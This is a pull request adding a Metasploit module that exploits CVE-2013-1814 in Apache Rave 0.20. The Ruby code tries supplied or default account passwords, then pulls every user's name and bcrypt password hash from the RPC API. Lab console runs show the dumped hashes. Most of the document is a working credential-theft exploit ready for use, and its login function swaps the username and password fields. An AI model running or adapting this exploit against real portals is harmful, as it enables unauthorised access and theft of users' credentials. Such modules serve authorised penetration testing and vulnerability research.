### PR TITLE
Add module for CVE-2013-1814

### DIFF
--- a/modules/auxiliary/gather/apache_rave_creds.rb
+++ b/modules/auxiliary/gather/apache_rave_creds.rb
@@ -1,0 +1,195 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Apache Rave Users Information Disclosure',
+			'Description'    => %q{
+				This module exploits an information disclosure in Apache Rave 0.20 and prior. The
+				vulnerability exists in the RPC API, which allows any authenticated user to
+				disclose information about all the users, including their password hashes. In order
+				to authenticate the user can provide his own credentials. Also the default ones
+				installed with Apache Rave 0.20 will be tried automatically. This module has been
+				successfully tested on Apache Rave 0.20.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Andreas Guth', # Vulnerability discovery and PoC
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2013-1814' ],
+					[ 'OSVDB', '91235' ],
+					[ 'BID', '58455' ],
+					[ 'EDB', '24744']
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),
+				OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),
+				OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),
+			], self.class)
+	end
+
+	def login(username, password)
+		uri = normalize_uri(target_uri.to_s, "j_spring_security_check")
+
+		res = send_request_cgi({
+			'uri'      => uri,
+			'method'   => 'POST',
+			'vars_post' => {
+				'j_password' => username,
+				'j_username' => password
+			}
+		})
+
+		if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+			return $1
+		else
+			return nil
+		end
+	end
+
+	def disclose(cookie)
+		uri = normalize_uri(target_uri.to_s, "app", "api", "rpc", "users", "get")
+
+		res = send_request_cgi({
+			'uri'      => uri,
+			'method'   => 'GET',
+			'vars_get' => {
+				'offset' => "1"
+			},
+			'cookie' => "JSESSIONID=#{cookie}"
+		})
+
+		if res and res.code == 200 and res.headers['Content-Type'] =~ /application\/json/ and res.body =~ /resultSet/
+			return res.body
+		else
+			return nil
+		end
+
+	end
+
+	def get_credentials(data)
+		json_info = JSON.parse(data)
+		json_info["result"]["resultSet"].each { |result|
+			vprint_good("#{rhost}:#{rport} - User #{result["username"]} found")
+			report_auth_info(
+				:host => rhost,
+				:port => rport,
+				:sname => "Apache Rave",
+				:user => result["username"],
+				:pass => result["password"],
+				:active => result["enabled"]
+			)
+		}
+	end
+
+	def setup
+		# Default accounts installed and enabled on Apache Rave 0.20
+		@default_accounts = {
+			"canonical" => "canonical",
+			"john.doe" => "john.doe",
+			"jane.doe" => "jane.doe",
+			"johnldap" => "johnldap",
+			"four.col" => "four.col",
+			"fourwn.col" => "fourwn.col",
+			"george.doe" => "george.doe",
+			"maija.m" => "maija.m",
+			"mario.rossi" => "mario.rossi",
+			"one.col" => "one.col"
+		}
+	end
+
+	def run
+
+		print_status("#{rhost}:#{rport} - Fingerprinting...")
+		res = send_request_cgi({
+			'uri'      => normalize_uri(target_uri.to_s, "login"),
+			'method'   => 'GET',
+		})
+
+		if not res
+			print_error("#{rhost}:#{rport} - No response, aborting...")
+			return
+		elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
+			version =$1
+			if version <= "0.20"
+				print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
+			else
+				print_error("#{rhost}:#{rport} - Apache Rave #{version} found. Not vulnerable. Aborting...")
+				return
+			end
+		else
+			print_warning("#{rhost}:#{rport} - Apache Rave Portal not found, trying to log-in anyway...")
+		end
+
+		cookie = nil
+		unless datastore["USERNAME"].empty? or datastore["PASSWORD"].empty?
+			print_status("#{rhost}:#{rport} - Login with the provided credentials...")
+			cookie = login(datastore["USERNAME"], datastore["PASSWORD"])
+			if cookie.nil?
+				print_error("#{rhost}:#{rport} - Login failed.")
+			else
+				print_good("#{rhost}:#{rport} - Login successful. Proceeding...")
+			end
+		end
+
+		if cookie.nil?
+			print_status("#{rhost}:#{rport} - Login with default accounts...")
+			@default_accounts.each { |user, password|
+				print_status("#{rhost}:#{rport} - Login with the #{user} default account...")
+				cookie = login(user, password)
+				unless cookie.nil?
+					print_good("#{rhost}:#{rport} - Login successful. Proceeding...")
+					break
+				end
+			}
+		end
+
+		if cookie.nil?
+			print_error("#{rhost}:#{rport} - Login failed. Aborting...")
+			return
+		end
+
+		print_status("#{rhost}:#{rport} - Disclosing information...")
+		users_data = disclose(cookie)
+		if users_data.nil?
+			print_error("#{rhost}:#{rport} - Disclosure failed. Aborting...")
+			return
+		else
+			print_good("#{rhost}:#{rport} - Disclosure successful")
+		end
+
+		path = store_loot(
+			'apache.rave.users',
+			'application/json',
+			rhost,
+			users_data,
+			nil,
+			"Apache Rave Users Database"
+		)
+		print_status("#{rhost}:#{rport} - Information saved in: #{path}")
+
+		print_status("#{rhost}:#{rport} - Recovering Hashes...")
+		get_credentials(users_data)
+
+	end
+
+end


### PR DESCRIPTION
This module abuses the information disclosure CVE-2013-1814 on Apache Rave 0.20 to retrieve a full list of usernames and hashes. Authentication is required. The user can provide his own credentials, but the module also has available a list of default users and passwords installed with Rave 0.20.

Rave 0.20 (binary distribution) can be downloaded from here: http://archive.apache.org/dist/rave/binaries/apache-rave-0.20-bin.tar.gz

Tested successfully on Ubuntu 10.04 (binary distribution):
- With default credentials:

```
msf auxiliary(apache_rave_creds) > run

[*] 192.168.172.143:8080 - Fingerprinting...
[+] 192.168.172.143:8080 - Apache Rave 0.20 found. Vulnerable. Proceeding...
[*] 192.168.172.143:8080 - Login with default accounts...
[*] 192.168.172.143:8080 - Login with the canonical default account...
[+] 192.168.172.143:8080 - Login successful. Proceeding...
[*] 192.168.172.143:8080 - Disclosing information...
[+] 192.168.172.143:8080 - Disclosure successful
[*] 192.168.172.143:8080 - Information saved in: /Users/juan/.msf4/loot/20130709123549_apache_rave_192.168.172.143_apache.rave.user_475883.bin
[*] 192.168.172.143:8080 - Recovering Hashes...
[*] Auxiliary module execution completed
msf auxiliary(apache_rave_creds) > creds

Credentials
===========

host             port  user         pass                                                          type      active?
----             ----  ----         ----                                                          ----      -------
192.168.172.143  8080  four.col     $2a$10$tZgWcaG2EJPLtseZ339n7uTu3GZn31h3iTr20orwgbbRAI15uoIFK  password  true
192.168.172.143  8080  fourwn.col   $2a$10$4kPYhgowurWqXGVDigxOxOVj/M.rqLRwqbn0kT/OD4pISL6pDG/c2  password  true
192.168.172.143  8080  george.doe   $2a$10$0bcOUkQgAwE/qmdc1NcUveNzx/IYIcOUu4ydyT8DEicTCxGJF/vcW  password  true
192.168.172.143  8080  jane.doe     $2a$10$YP9cjZEA.gG/ng2YwTBIyucMpuiQ7Fvz0K8rOt14rIBhVwlOrh1tu  password  true
192.168.172.143  8080  john.doe     $2a$10$8Dir7boy3UyVqy6erfj6WuQXUTf.ejTldPSsVIty7.pPT3Krkly26  password  true
192.168.172.143  8080  johnldap     $2a$10$R6xUi6HWLxHrV7Zl6bt4CeV5e2BZPiKu5JEC.Csfw9jVcv3SCdDZq  password  true
192.168.172.143  8080  juan         $2a$10$eGg/MHlp.MBjnRBE27UwM.viwGpvg9h2HwJf4YByQJiSve7mSOkj2  password  true
192.168.172.143  8080  juan2        $2a$10$jQfWaY/Dn7s0Zr/oA4.zvualnPuQYFsmi4dlFJGE/wFsFYqqf.KyW  password  true
192.168.172.143  8080  maija.m      $2a$10$3feYdjrW40hkqP4/xupKP.YMgdYmDsZZus./vK4FbBs9QZG2.FuNC  password  true
192.168.172.143  8080  mario.rossi  $2a$10$HZ6WHAKQCs8waLooL98l6.fLzwh3D8u/V0.UebIjojawfXJhX1DQ2  password  true

msf auxiliary(apache_rave_creds) > services

Services
========

host             port  proto  name         state  info
----             ----  -----  ----         -----  ----
192.168.172.143  8080  tcp    apache rave  open   

```
- With bad user provided credentials (module tries the default ones if the user provided fails):

```
msf auxiliary(apache_rave_creds) > set USERNAME test
USERNAME => test
msf auxiliary(apache_rave_creds) > set PASSWORD test2
PASSWORD => test2
rmsf auxiliary(apache_rave_creds) > run

[*] 192.168.172.143:8080 - Fingerprinting...
[+] 192.168.172.143:8080 - Apache Rave 0.20 found. Vulnerable. Proceeding...
[*] 192.168.172.143:8080 - Login with the provided credentials...
[-] 192.168.172.143:8080 - Login failed.
[*] 192.168.172.143:8080 - Login with default accounts...
[*] 192.168.172.143:8080 - Login with the canonical default account...
[+] 192.168.172.143:8080 - Login successful. Proceeding...
[*] 192.168.172.143:8080 - Disclosing information...
[+] 192.168.172.143:8080 - Disclosure successful
[*] 192.168.172.143:8080 - Information saved in: /Users/juan/.msf4/loot/20130709123639_apache_rave_192.168.172.143_apache.rave.user_075723.bin
[*] 192.168.172.143:8080 - Recovering Hashes...
[*] Auxiliary module execution completed

```
- User provided correct credentials

```
msf auxiliary(apache_rave_creds) > set USERNAME juan
USERNAME => juan
msf auxiliary(apache_rave_creds) > set PASSWORD juan
PASSWORD => juan
msf auxiliary(apache_rave_creds) > run

[*] 192.168.172.143:8080 - Fingerprinting...
[+] 192.168.172.143:8080 - Apache Rave 0.20 found. Vulnerable. Proceeding...
[*] 192.168.172.143:8080 - Login with the provided credentials...
[+] 192.168.172.143:8080 - Login successful. Proceeding...
[*] 192.168.172.143:8080 - Disclosing information...
[+] 192.168.172.143:8080 - Disclosure successful
[*] 192.168.172.143:8080 - Information saved in: /Users/juan/.msf4/loot/20130709123653_apache_rave_192.168.172.143_apache.rave.user_928273.bin
[*] 192.168.172.143:8080 - Recovering Hashes...
[*] Auxiliary module execution completed

```
